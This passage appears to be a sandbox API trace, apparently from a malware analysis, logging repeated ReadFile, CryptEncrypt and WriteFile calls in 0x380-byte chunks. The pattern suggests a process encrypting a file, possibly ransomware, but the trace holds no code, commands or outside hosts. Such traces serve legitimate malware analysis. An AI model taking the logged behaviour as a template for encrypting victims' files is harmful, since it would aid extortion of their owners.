pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.079] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.079] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.079] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.087] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.087] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.087] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.087] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.087] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.087] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.087] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.087] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.087] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.087] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.087] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.087] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.087] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.088] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.088] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.088] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.088] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.088] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.088] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.088] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.088] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 